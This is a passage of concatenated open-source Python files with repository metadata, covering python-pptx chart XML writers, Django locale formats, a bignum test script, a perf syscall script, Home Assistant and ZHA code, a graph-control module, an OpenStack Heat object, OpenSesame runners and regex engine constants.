'cat_count': categories.leaf_count,
'cat_pt_xml': self._cat_num_pt_xml,
'nsdecls': ' %s' % nsdecls('c'),
})
)
if categories.depth == 1:
return parse_xml(
self._cat_tmpl.format(**{
'wksht_ref': self._series.categories_ref,
'cat_count': categories.leaf_count,
'cat_pt_xml': self._cat_pt_xml,
'nsdecls': ' %s' % nsdecls('c'),
})
)
return parse_xml(
self._multiLvl_cat_tmpl.format(**{
'wksht_ref': self._series.categories_ref,
'cat_count': categories.leaf_count,
'lvl_xml': self._lvl_xml(categories),
'nsdecls': ' %s' % nsdecls('c'),
})
)
@property
def cat_xml(self):
"""
The unicode XML snippet for the ``<c:cat>`` element for this series,
containing the category labels and spreadsheet reference.
"""
categories = self._series.categories
if categories.are_numeric:
return self._numRef_cat_tmpl.format(**{
'wksht_ref': self._series.categories_ref,
'number_format': categories.number_format,
'cat_count': categories.leaf_count,
'cat_pt_xml': self._cat_num_pt_xml,
'nsdecls': '',
})
if categories.depth == 1:
return self._cat_tmpl.format(**{
'wksht_ref': self._series.categories_ref,
'cat_count': categories.leaf_count,
'cat_pt_xml': self._cat_pt_xml,
'nsdecls': '',
})
return self._multiLvl_cat_tmpl.format(**{
'wksht_ref': self._series.categories_ref,
'cat_count': categories.leaf_count,
'lvl_xml': self._lvl_xml(categories),
'nsdecls': '',
})
@property
def val(self):
"""
The ``<c:val>`` XML for this series, as an oxml element.
"""
xml = self._val_tmpl.format(**{
'nsdecls': ' %s' % nsdecls('c'),
'values_ref': self._series.values_ref,
'number_format': self._series.number_format,
'val_count': len(self._series),
'val_pt_xml': self._val_pt_xml,
})
return parse_xml(xml)
@property
def val_xml(self):
"""
Return the unicode XML snippet for the ``<c:val>`` element describing
this series, containing the series values and their spreadsheet range
reference.
"""
return self._val_tmpl.format(**{
'nsdecls': '',
'values_ref': self._series.values_ref,
'number_format': self._series.number_format,
'val_count': len(self._series),
'val_pt_xml': self._val_pt_xml,
})
@property
def _cat_num_pt_xml(self):
"""
The unicode XML snippet for the ``<c:pt>`` elements when category
labels are numeric (including date type).
"""
xml = ''
for idx, category in enumerate(self._series.categories):
xml += (
' <c:pt idx="{cat_idx}">\n'
' <c:v>{cat_lbl_str}</c:v>\n'
' </c:pt>\n'
).format(**{
'cat_idx': idx,
'cat_lbl_str': category.numeric_str_val(self._date_1904),
})
return xml
@property
def _cat_pt_xml(self):
"""
The unicode XML snippet for the ``<c:pt>`` elements containing the
category names for this series.
"""
xml = ''
for idx, category in enumerate(self._series.categories):
xml += (
' <c:pt idx="{cat_idx}">\n'
' <c:v>{cat_label}</c:v>\n'
' </c:pt>\n'
).format(**{
'cat_idx': idx,
'cat_label': escape(to_unicode(category.label)),
})
return xml
@property
def _cat_tmpl(self):
"""
The template for the ``<c:cat>`` element for this series, containing
the category labels and spreadsheet reference.
"""
return (
' <c:cat{nsdecls}>\n'
' <c:strRef>\n'
' <c:f>{wksht_ref}</c:f>\n'
' <c:strCache>\n'
' <c:ptCount val="{cat_count}"/>\n'
'{cat_pt_xml}'
' </c:strCache>\n'
' </c:strRef>\n'
' </c:cat>\n'
)
def _lvl_xml(self, categories):
"""
The unicode XML snippet for the ``<c:lvl>`` elements containing
multi-level category names.
"""
def lvl_pt_xml(level):
xml = ''
for idx, name in level:
xml += (
' <c:pt idx="%d">\n'
' <c:v>%s</c:v>\n'
' </c:pt>\n'
) % (idx, escape('%s' % name))
return xml
xml = ''
for level in categories.levels:
xml += (
' <c:lvl>\n'
'{lvl_pt_xml}'
' </c:lvl>\n'
).format(**{
'lvl_pt_xml': lvl_pt_xml(level),
})
return xml
@property
def _multiLvl_cat_tmpl(self):
"""
The template for the ``<c:cat>`` element for this series when there
are multi-level (nested) categories.
"""
return (
' <c:cat{nsdecls}>\n'
' <c:multiLvlStrRef>\n'
' <c:f>{wksht_ref}</c:f>\n'
' <c:multiLvlStrCache>\n'
' <c:ptCount val="{cat_count}"/>\n'
'{lvl_xml}'
' </c:multiLvlStrCache>\n'
' </c:multiLvlStrRef>\n'
' </c:cat>\n'
)
@property
def _numRef_cat_tmpl(self):
"""
The template for the ``<c:cat>`` element for this series when the
labels are numeric (or date) values.
"""
return (
' <c:cat{nsdecls}>\n'
' <c:numRef>\n'
' <c:f>{wksht_ref}</c:f>\n'
' <c:numCache>\n'
' <c:formatCode>{number_format}</c:formatCode>\n'
' <c:ptCount val="{cat_count}"/>\n'
'{cat_pt_xml}'
' </c:numCache>\n'
' </c:numRef>\n'
' </c:cat>\n'
)
@property
def _val_pt_xml(self):
"""
The unicode XML snippet containing the ``<c:pt>`` elements containing
the values for this series.
"""
xml = ''
for idx, value in enumerate(self._series.values):
if value is None:
continue
xml += (
' <c:pt idx="{val_idx:d}">\n'
' <c:v>{value}</c:v>\n'
' </c:pt>\n'
).format(**{
'val_idx': idx,
'value': value,
})
return xml
@property
def _val_tmpl(self):
"""
The template for the ``<c:val>`` element for this series, containing
the series values and their spreadsheet range reference.
"""
return (
' <c:val{nsdecls}>\n'
' <c:numRef>\n'
' <c:f>{values_ref}</c:f>\n'
' <c:numCache>\n'
' <c:formatCode>{number_format}</c:formatCode>\n'
' <c:ptCount val="{val_count}"/>\n'
'{val_pt_xml}'
' </c:numCache>\n'
' </c:numRef>\n'
' </c:val>\n'
)
class _XySeriesXmlWriter(_BaseSeriesXmlWriter):
"""
Generates XML snippets particular to an XY series.
"""
@property
def xVal(self):
"""
Return the ``<c:xVal>`` element for this series as an oxml element.
This element contains the X values for this series.
"""
xml = self._xVal_tmpl.format(**{
'nsdecls': ' %s' % nsdecls('c'),
'numRef_xml': self.numRef_xml(
self._series.x_values_ref, self._series.number_format,
self._series.x_values
),
})
return parse_xml(xml)
@property
def xVal_xml(self):
"""
Return the ``<c:xVal>`` element for this series as unicode text. This
element contains the X values for this series.
"""
return self._xVal_tmpl.format(**{
'nsdecls': '',
'numRef_xml': self.numRef_xml(
self._series.x_values_ref, self._series.number_format,
self._series.x_values
),
})
@property
def yVal(self):
"""
Return the ``<c:yVal>`` element for this series as an oxml element.
This element contains the Y values for this series.
"""
xml = self._yVal_tmpl.format(**{
'nsdecls': ' %s' % nsdecls('c'),
'numRef_xml': self.numRef_xml(
self._series.y_values_ref, self._series.number_format,
self._series.y_values
),
})
return parse_xml(xml)
@property
def yVal_xml(self):
"""
Return the ``<c:yVal>`` element for this series as unicode text. This
element contains the Y values for this series.
"""
return self._yVal_tmpl.format(**{
'nsdecls': '',
'numRef_xml': self.numRef_xml(
self._series.y_values_ref, self._series.number_format,
self._series.y_values
),
})
@property
def _xVal_tmpl(self):
"""
The template for the ``<c:xVal>`` element for this series, containing
the X values and their spreadsheet range reference.
"""
return (
' <c:xVal{nsdecls}>\n'
'{numRef_xml}'
' </c:xVal>\n'
)
@property
def _yVal_tmpl(self):
"""
The template for the ``<c:yVal>`` element for this series, containing
the Y values and their spreadsheet range reference.
"""
return (
' <c:yVal{nsdecls}>\n'
'{numRef_xml}'
' </c:yVal>\n'
)
class _BubbleSeriesXmlWriter(_XySeriesXmlWriter):
"""
Generates XML snippets particular to a bubble chart series.
"""
@property
def bubbleSize(self):
"""
Return the ``<c:bubbleSize>`` element for this series as an oxml
element. This element contains the bubble size values for this
series.
"""
xml = self._bubbleSize_tmpl.format(**{
'nsdecls': ' %s' % nsdecls('c'),
'numRef_xml': self.numRef_xml(
self._series.bubble_sizes_ref, self._series.number_format,
self._series.bubble_sizes
),
})
return parse_xml(xml)
@property
def bubbleSize_xml(self):
"""
Return the ``<c:bubbleSize>`` element for this series as unicode
text. This element contains the bubble size values for all the
data points in the chart.
"""
return self._bubbleSize_tmpl.format(**{
'nsdecls': '',
'numRef_xml': self.numRef_xml(
self._series.bubble_sizes_ref, self._series.number_format,
self._series.bubble_sizes
),
})
@property
def _bubbleSize_tmpl(self):
"""
The template for the ``<c:bubbleSize>`` element for this series,
containing the bubble size values and their spreadsheet range
reference.
"""
return (
' <c:bubbleSize{nsdecls}>\n'
'{numRef_xml}'
' </c:bubbleSize>\n'
)
class _BubbleSeriesXmlRewriter(_BaseSeriesXmlRewriter):
"""
A series rewriter suitable for bubble charts.
"""
def _rewrite_ser_data(self, ser, series_data, date_1904):
"""
Rewrite the ``<c:tx>``, ``<c:cat>`` and ``<c:val>`` child elements
of *ser* based on the values in *series_data*.
"""
ser._remove_tx()
ser._remove_xVal()
ser._remove_yVal()
ser._remove_bubbleSize()
xml_writer = _BubbleSeriesXmlWriter(series_data)
ser._insert_tx(xml_writer.tx)
ser._insert_xVal(xml_writer.xVal)
ser._insert_yVal(xml_writer.yVal)
ser._insert_bubbleSize(xml_writer.bubbleSize)
class _CategorySeriesXmlRewriter(_BaseSeriesXmlRewriter):
"""
A series rewriter suitable for category charts.
"""
def _rewrite_ser_data(self, ser, series_data, date_1904):
"""
Rewrite the ``<c:tx>``, ``<c:cat>`` and ``<c:val>`` child elements
of *ser* based on the values in *series_data*.
"""
ser._remove_tx()
ser._remove_cat()
ser._remove_val()
xml_writer = _CategorySeriesXmlWriter(series_data, date_1904)
ser._insert_tx(xml_writer.tx)
ser._insert_cat(xml_writer.cat)
ser._insert_val(xml_writer.val)
class _XySeriesXmlRewriter(_BaseSeriesXmlRewriter):
"""
A series rewriter suitable for XY (aka. scatter) charts.
"""
def _rewrite_ser_data(self, ser, series_data, date_1904):
"""
Rewrite the ``<c:tx>``, ``<c:xVal>`` and ``<c:yVal>`` child elements
of *ser* based on the values in *series_data*.
"""
ser._remove_tx()
ser._remove_xVal()
ser._remove_yVal()
xml_writer = _XySeriesXmlWriter(series_data)
ser._insert_tx(xml_writer.tx)
ser._insert_xVal(xml_writer.xVal)
ser._insert_yVal(xml_writer.yVal)
|
apache-2.0
|
towerjoo/DjangoNotes
|
Django-1.5.1/django/conf/locale/nb/formats.py
|
107
|
1585
|
# -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j. F Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'd.m.Y'
SHORT_DATETIME_FORMAT = 'd.m.Y H:i'
FIRST_DAY_OF_WEEK = 1 # Monday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# Kept ISO formats as they are in first position
DATE_INPUT_FORMATS = (
'%Y-%m-%d', '%d.%m.%Y', '%d.%m.%y', # '2006-10-25', '25.10.2006', '25.10.06'
# '%d. %b %Y', '%d %b %Y', # '25. okt 2006', '25 okt 2006'
# '%d. %b. %Y', '%d %b. %Y', # '25. okt. 2006', '25 okt. 2006'
# '%d. %B %Y', '%d %B %Y', # '25. oktober 2006', '25 oktober 2006'
)
DATETIME_INPUT_FORMATS = (
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M', # '25.10.2006 14:30'
'%d.%m.%Y', # '25.10.2006'
'%d.%m.%y %H:%M:%S', # '25.10.06 14:30:59'
'%d.%m.%y %H:%M', # '25.10.06 14:30'
'%d.%m.%y', # '25.10.06'
)
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '\xa0' # non-breaking space
NUMBER_GROUPING = 3
|
mit
|
kokke/tiny-bignum-c
|
scripts/test_rand.py
|
1
|
4619
|
#
#
# Can take one command-line parameter: number of tests to run
#
# Runs NTESTS random tests of selecting an operand from + - *
# and applying it on two random operands and comparing the result
# to the one Python can calculate
#
# In effect, this verifies the C implementation against Python's
#
#
from random import Random, choice
import subprocess
import sys
import os
import math
TEST_BINARY = "./build/test_random"
def run_shell(runthis):
""" Helper, runs a command string as if given to the shell """
#print("trying to run '%s'" % runthis)
osstdout = subprocess.Popen(runthis, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)
theInfo = osstdout.communicate()[0].strip()
#return (theInfo, osstdout.returncode)
return osstdout.returncode
# Check for command-line arguments - default to 100 tests
if len(sys.argv) == 2:
NTESTS = int(sys.argv[1])
else:
NTESTS = 100
# Give the operands names
ADD = 0
SUB = 1
MUL = 2
DIV = 3
AND = 4
OR = 5
XOR = 6
POW = 7
MOD = 8
RSHIFT = 9
LSHIFT = 10
ISQRT = 11
NUM_OPERATIONS = 12 # this variable should be 1 larger than the last supported operation ^^
# Instantiate object of Random-class for choosing an operand and two operators
rand = Random()
# List of command-strings leading to failures - expected to be empty if no bugs are triggered
failures = list()
print("\nRunning %d random tests (parsed using from_string):\n" % NTESTS)
# Iterate NTESTS times
i = 0
while i < NTESTS:
i += 1
# Choose random operand
while 1:
operation = choice(range(NUM_OPERATIONS))
if operation != POW:
break
expected = 0
# Generate two large operators
if operation in [LSHIFT, RSHIFT]:
oper1 = rand.randint(0, 0xFF)
oper2 = rand.randint(0, 32)
else:
oper1 = rand.randint(0, 0xFFFFFF)
oper2 = rand.randint(0, 0xFFFFFF)
# Calculate expected value
if operation == ADD:
expected = oper1 + oper2
elif operation == SUB:
# bignum only supports unsigned, so if B > A
# we swap operands to avoid the underflow / wrap-around
if oper2 > oper1:
tmp = oper1
oper1 = oper2
oper2 = tmp
expected = oper1 - oper2
elif operation == MUL:
expected = oper1 * oper2
elif operation == DIV:
if oper2 > oper1:
tmp = oper1
oper1 = oper2
oper2 = tmp
# avoid dividing by 0
if oper2 == 0:
oper2 += 1
expected = oper1 / oper2
elif operation == AND:
expected = oper1 & oper2
elif operation == OR:
expected = oper1 | oper2
elif operation == XOR:
expected = oper1 ^ oper2
elif operation == POW:
expected = oper1 ** oper2
elif operation == MOD:
# avoid dividing by 0
if oper2 == 0:
oper2 += 1
expected = oper1 % oper2
elif operation == LSHIFT:
expected = oper1 << oper2
elif operation == RSHIFT:
expected = oper1 >> oper2
elif operation == ISQRT:
expected = int(math.sqrt(oper1));
# Convert to string to pass to C program
# NOTE: bignum_from_string requires hex format and even no. of chars in str
oper1 = "%.0x" % oper1
oper2 = "%.0x" % oper2
expected = "%.0x" % expected
# bignum_from_string requires string-length to be an even number
# so we zero-pad the number if the length is an odd number of bytes
while (len(oper1) & 15) != 0:
oper1 = "0" + oper1
while (len(oper2) & 15) != 0:
oper2 = "0" + oper2
while (len(expected) & 15) != 0:
expected = "0" + expected
# Create the command-string to run in shell
cmd_string = "%s %s %s %s %s" % (TEST_BINARY, operation, oper1, oper2, expected)
if len([e for e in cmd_string.split(" ") if e]) < 5:
# something has gone wrong with making the command-string - abort and retry
i -= 1
continue
# Expect return code to be ZERO for successful comparison
success = (0 == run_shell(cmd_string))
# Add command-string to list in case of failure
# this allowis the user to re-create the failure
if not success:
failures.append(cmd_string)
sys.stdout.write("x")
try:
f = open("error_log.txt", "a+")
f.write(cmd_string + os.linesep)
f.close()
except:
import traceback
print("\n\nEXCEPTION:\n\n" + traceback.format_exc())
else:
sys.stdout.write(".")
sys.stdout.flush()
sys.stdout.write("\n")
# After running the tests, give user feedback
print("")
print("%d/%d random tests passed." % (NTESTS - len(failures), NTESTS))
print("")
# Output the commands leading to failure, if any occurred:
if len(failures) > 0:
print("")
print("\n".join(failures))
print("")
|
unlicense
|
gq213/linux-3.10.72
|
tools/perf/scripts/python/failed-syscalls-by-pid.py
|
11180
|
2058
|
# failed system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide failed system call totals, broken down by pid.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s syscall-counts-by-pid.py [comm|pid]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_error_totals()
def raw_syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, ret):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
if ret < 0:
try:
syscalls[common_comm][common_pid][id][ret] += 1
except TypeError:
syscalls[common_comm][common_pid][id][ret] = 1
def print_error_totals():
if for_comm is not None:
print "\nsyscall errors for %s:\n\n" % (for_comm),
else:
print "\nsyscall errors:\n\n",
print "%-30s %10s\n" % ("comm [pid]", "count"),
print "%-30s %10s\n" % ("------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id in id_keys:
print " syscall: %-16s\n" % syscall_name(id),
ret_keys = syscalls[comm][pid][id].keys()
for ret, val in sorted(syscalls[comm][pid][id].iteritems(), key = lambda(k, v): (v, k), reverse = True):
print " err = %-20s %10d\n" % (strerror(ret), val),
|
gpl-2.0
|
devdelay/home-assistant
|
homeassistant/components/arduino.py
|
7
|
3724
|
"""
Support for Arduino boards running with the Firmata firmware.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/arduino/
"""
import logging
from homeassistant.const import (
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP)
from homeassistant.helpers import validate_config
DOMAIN = "arduino"
REQUIREMENTS = ['PyMata==2.12']
BOARD = None
_LOGGER = logging.getLogger(__name__)
def setup(hass, config):
"""Setup the Arduino component."""
if not validate_config(config,
{DOMAIN: ['port']},
_LOGGER):
return False
import serial
global BOARD
try:
BOARD = ArduinoBoard(config[DOMAIN]['port'])
except (serial.serialutil.SerialException, FileNotFoundError):
_LOGGER.exception("Your port is not accessible.")
return False
if BOARD.get_firmata()[1] <= 2:
_LOGGER.error("The StandardFirmata sketch should be 2.2 or newer.")
return False
def stop_arduino(event):
"""Stop the Arduino service."""
BOARD.disconnect()
def start_arduino(event):
"""Start the Arduino service."""
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_arduino)
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, start_arduino)
return True
class ArduinoBoard(object):
"""Representation of an Arduino board."""
def __init__(self, port):
"""Initialize the board."""
from PyMata.pymata import PyMata
self._port = port
self._board = PyMata(self._port, verbose=False)
def set_mode(self, pin, direction, mode):
"""Set the mode and the direction of a given pin."""
if mode == 'analog' and direction == 'in':
self._board.set_pin_mode(pin,
self._board.INPUT,
self._board.ANALOG)
elif mode == 'analog' and direction == 'out':
self._board.set_pin_mode(pin,
self._board.OUTPUT,
self._board.ANALOG)
elif mode == 'digital' and direction == 'in':
self._board.set_pin_mode(pin,
self._board.INPUT,
self._board.DIGITAL)
elif mode == 'digital' and direction == 'out':
self._board.set_pin_mode(pin,
self._board.OUTPUT,
self._board.DIGITAL)
elif mode == 'pwm':
self._board.set_pin_mode(pin,
self._board.OUTPUT,
self._board.PWM)
def get_analog_inputs(self):
"""Get the values from the pins."""
self._board.capability_query()
return self._board.get_analog_response_table()
def set_digital_out_high(self, pin):
"""Set a given digital pin to high."""
self._board.digital_write(pin, 1)
def set_digital_out_low(self, pin):
"""Set a given digital pin to low."""
self._board.digital_write(pin, 0)
def get_digital_in(self, pin):
"""Get the value from a given digital pin."""
self._board.digital_read(pin)
def get_analog_in(self, pin):
"""Get the value from a given analog pin."""
self._board.analog_read(pin)
def get_firmata(self):
"""Return the version of the Firmata firmware."""
return self._board.get_firmata_version()
def disconnect(self):
"""Disconnect the board and close the serial connection."""
self._board.reset()
self._board.close()
|
mit
|
partofthething/home-assistant
|
tests/components/zha/test_device_tracker.py
|
21
|
3026
|
"""Test ZHA Device Tracker."""
from datetime import timedelta
import time
import pytest
import zigpy.zcl.clusters.general as general
from homeassistant.components.device_tracker import DOMAIN, SOURCE_TYPE_ROUTER
from homeassistant.components.zha.core.registries import (
SMARTTHINGS_ARRIVAL_SENSOR_DEVICE_TYPE,
)
from homeassistant.const import STATE_HOME, STATE_NOT_HOME, STATE_UNAVAILABLE
import homeassistant.util.dt as dt_util
from .common import (
async_enable_traffic,
async_test_rejoin,
find_entity_id,
send_attributes_report,
)
from tests.common import async_fire_time_changed
@pytest.fixture
def zigpy_device_dt(zigpy_device_mock):
"""Device tracker zigpy device."""
endpoints = {
1: {
"in_clusters": [
general.Basic.cluster_id,
general.PowerConfiguration.cluster_id,
general.Identify.cluster_id,
general.PollControl.cluster_id,
general.BinaryInput.cluster_id,
],
"out_clusters": [general.Identify.cluster_id, general.Ota.cluster_id],
"device_type": SMARTTHINGS_ARRIVAL_SENSOR_DEVICE_TYPE,
}
}
return zigpy_device_mock(endpoints)
async def test_device_tracker(hass, zha_device_joined_restored, zigpy_device_dt):
"""Test zha device tracker platform."""
zha_device = await zha_device_joined_restored(zigpy_device_dt)
cluster = zigpy_device_dt.endpoints.get(1).power
entity_id = await find_entity_id(DOMAIN, zha_device, hass)
assert entity_id is not None
assert hass.states.get(entity_id).state == STATE_HOME
await async_enable_traffic(hass, [zha_device], enabled=False)
# test that the device tracker was created and that it is unavailable
assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
zigpy_device_dt.last_seen = time.time() - 120
next_update = dt_util.utcnow() + timedelta(seconds=30)
async_fire_time_changed(hass, next_update)
await hass.async_block_till_done()
# allow traffic to flow through the gateway and device
await async_enable_traffic(hass, [zha_device])
# test that the state has changed from unavailable to not home
assert hass.states.get(entity_id).state == STATE_NOT_HOME
# turn state flip
await send_attributes_report(
hass, cluster, {0x0000: 0, 0x0020: 23, 0x0021: 200, 0x0001: 2}
)
zigpy_device_dt.last_seen = time.time() + 10
next_update = dt_util.utcnow() + timedelta(seconds=30)
async_fire_time_changed(hass, next_update)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_HOME
entity = hass.data[DOMAIN].get_entity(entity_id)
assert entity.is_connected is True
assert entity.source_type == SOURCE_TYPE_ROUTER
assert entity.battery_level == 100
# test adding device tracker to the network and HA
await async_test_rejoin(hass, zigpy_device_dt, [cluster], (2,))
assert hass.states.get(entity_id).state == STATE_HOME
|
mit
|
rionbr/CANA
|
cana/control/mds.py
|
1
|
1888
|
# -*- coding: utf-8 -*-
"""
Minimum Dominating Set
=======================
"""
# Copyright (C) 2021 by
# Alex Gates <[email protected]>
# Rion Brattig Correia <[email protected]>
# All rights reserved.
# MIT license.
import itertools
#
# Minimum Dominating Set
#
def mds(directed_graph, max_search=5, keep_self_loops=True):
"""The minimum dominating set method.
Args:
directed_graph (networkx.DiGraph) : The structural graph.
max_search (int) : Maximum search of additional variables. Defaults to 5.
keep_self_loops (bool) : If self-loops are used in the computation.
Returns:
(list) : A list of sets with the driver nodes.
"""
N = len(directed_graph)
root_var = _root_variables(directed_graph, keep_self_loops=keep_self_loops)
if len(_get_dominated_set(directed_graph, root_var)) == N:
return [root_var]
else:
MDS_sets = []
nonroot_variables = set(directed_graph.nodes()) - set(root_var)
for num_additional_var in range(1, max_search):
for an_combo in itertools.combinations(nonroot_variables, num_additional_var):
possible_dvs = root_var.union(an_combo)
if len(_get_dominated_set(directed_graph, possible_dvs)) == N:
MDS_sets.append(possible_dvs)
if len(MDS_sets) > 0:
break
return MDS_sets
def _get_dominated_set(directed_graph, dominatingset):
"""
TODO
"""
dominatedset = set(dominatingset)
for dn in dominatingset:
dominatedset.update(directed_graph.neighbors(dn))
return dominatedset
def _root_variables(directed_graph, keep_self_loops=True):
"""
"""
return set([n for n in directed_graph.nodes()
if (directed_graph.in_degree(n) == 0) or ((not keep_self_loops) and (directed_graph.neighbors(n) == [n]))])
|
mit
|
takeshineshiro/heat
|
heat/objects/software_deployment.py
|
5
|
3374
|
# Copyright 2014 Intel Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SoftwareDeployment object
"""
from oslo_versionedobjects import base
from oslo_versionedobjects import fields
from heat.db import api as db_api
from heat.objects import fields as heat_fields
from heat.objects import software_config
class SoftwareDeployment(base.VersionedObject,
base.VersionedObjectDictCompat,
base.ComparableVersionedObject):
fields = {
'id': fields.StringField(),
'config_id': fields.StringField(),
'server_id': fields.StringField(),
'input_values': heat_fields.JsonField(nullable=True),
'output_values': heat_fields.JsonField(nullable=True),
'tenant': fields.StringField(),
'stack_user_project_id': fields.StringField(nullable=True),
'action': fields.StringField(nullable=True),
'status': fields.StringField(nullable=True),
'status_reason': fields.StringField(nullable=True),
'config': fields.ObjectField('SoftwareConfig'),
'created_at': fields.DateTimeField(read_only=True),
'updated_at': fields.DateTimeField(nullable=True),
}
@staticmethod
def _from_db_object(context, deployment, db_deployment):
for field in deployment.fields:
if field == 'config':
deployment[field] = (
software_config.SoftwareConfig._from_db_object(
context, software_config.SoftwareConfig(),
db_deployment['config'])
)
else:
deployment[field] = db_deployment[field]
deployment._context = context
deployment.obj_reset_changes()
return deployment
@classmethod
def create(cls, context, values):
return cls._from_db_object(
context, cls(), db_api.software_deployment_create(context, values))
@classmethod
def get_by_id(cls, context, deployment_id):
return cls._from_db_object(
context, cls(),
db_api.software_deployment_get(context, deployment_id))
@classmethod
def get_all(cls, context, server_id=None):
return [cls._from_db_object(context, cls(), db_deployment)
for db_deployment in db_api.software_deployment_get_all(
context, server_id)]
@classmethod
def update_by_id(cls, context, deployment_id, values):
"""Note this is a bit unusual as it returns the object.
Other update_by_id methods return a bool (was it updated).
"""
return cls._from_db_object(
context, cls(),
db_api.software_deployment_update(context, deployment_id, values))
@classmethod
def delete(cls, context, deployment_id):
db_api.software_deployment_delete(context, deployment_id)
|
apache-2.0
|
eort/OpenSesame
|
libqtopensesame/runners/__init__.py
|
2
|
1045
|
#-*- coding:utf-8 -*-
"""
This file is part of OpenSesame.
OpenSesame is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
OpenSesame is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with OpenSesame. If not, see <http://www.gnu.org/licenses/>.
"""
from libopensesame.py3compat import *
from libqtopensesame.runners.base_runner import base_runner
from libqtopensesame.runners.inprocess_runner import inprocess_runner
from libqtopensesame.runners.external_runner import external_runner
from libqtopensesame.runners.multiprocess_runner import multiprocess_runner
runner_list = ['inprocess', 'external', 'multiprocess']
|
gpl-3.0
|
Event38/MissionPlanner
|
Lib/sre_constants.py
|
64
|
7398
|
#
# Secret Labs' Regular Expression Engine
#
# various symbols used by the regular expression engine.
# run this script to update the _sre include files!
#
# Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved.
#
# See the sre.py file for information on usage and redistribution.
#
"""Internal support module for sre"""
# update when constants are added or removed
MAGIC = 20031017
# max code word in this release
MAXREPEAT = 65535
# SRE standard exception (access as sre.error)
# should this really be here?
class error(Exception):
pass
# operators
FAILURE = "failure"
SUCCESS = "success"
ANY = "any"
ANY_ALL = "any_all"
ASSERT = "assert"
ASSERT_NOT = "assert_not"
AT = "at"
BIGCHARSET = "bigcharset"
BRANCH = "branch"
CALL = "call"
CATEGORY = "category"
CHARSET = "charset"
GROUPREF = "groupref"
GROUPREF_IGNORE = "groupref_ignore"
GROUPREF_EXISTS = "groupref_exists"
IN = "in"
IN_IGNORE = "in_ignore"
INFO = "info"
JUMP = "jump"
LITERAL = "literal"
LITERAL_IGNORE = "literal_ignore"
MARK = "mark"
MAX_REPEAT = "max_repeat"
MAX_UNTIL = "max_until"
MIN_REPEAT = "min_repeat"
MIN_UNTIL = "min_until"
NEGATE = "negate"
NOT_LITERAL = "not_literal"
NOT_LITERAL_IGNORE = "not_literal_ignore"
RANGE = "range"
REPEAT = "repeat"
REPEAT_ONE = "repeat_one"
SUBPATTERN = "subpattern"
MIN_REPEAT_ONE = "min_repeat_one"
# positions
AT_BEGINNING = "at_beginning"
AT_BEGINNING_LINE = "at_beginning_line"
AT_BEGINNING_STRING = "at_beginning_string"
AT_BOUNDARY = "at_boundary"
AT_NON_BOUNDARY = "at_non_boundary"
AT_END = "at_end"
AT_END_LINE = "at_end_line"
AT_END_STRING = "at_end_string"
AT_LOC_BOUNDARY = "at_loc_boundary"
AT_LOC_NON_BOUNDARY = "at_loc_non_boundary"
AT_UNI_BOUNDARY = "at_uni_boundary"
AT_UNI_NON_BOUNDARY = "at_uni_non_boundary"
# categories
CATEGORY_DIGIT = "category_digit"
CATEGORY_NOT_DIGIT = "category_not_digit"
CATEGORY_SPACE = "category_space"
CATEGORY_NOT_SPACE = "category_not_space"
CATEGORY_WORD = "category_word"
CATEGORY_NOT_WORD = "category_not_word"
CATEGORY_LINEBREAK = "category_linebreak"
CATEGORY_NOT_LINEBREAK = "category_not_linebreak"
CATEGORY_LOC_WORD = "category_loc_word"
CATEGORY_LOC_NOT_WORD = "category_loc_not_word"
CATEGORY_UNI_DIGIT = "category_uni_digit"
CATEGORY_UNI_NOT_DIGIT = "category_uni_not_digit"
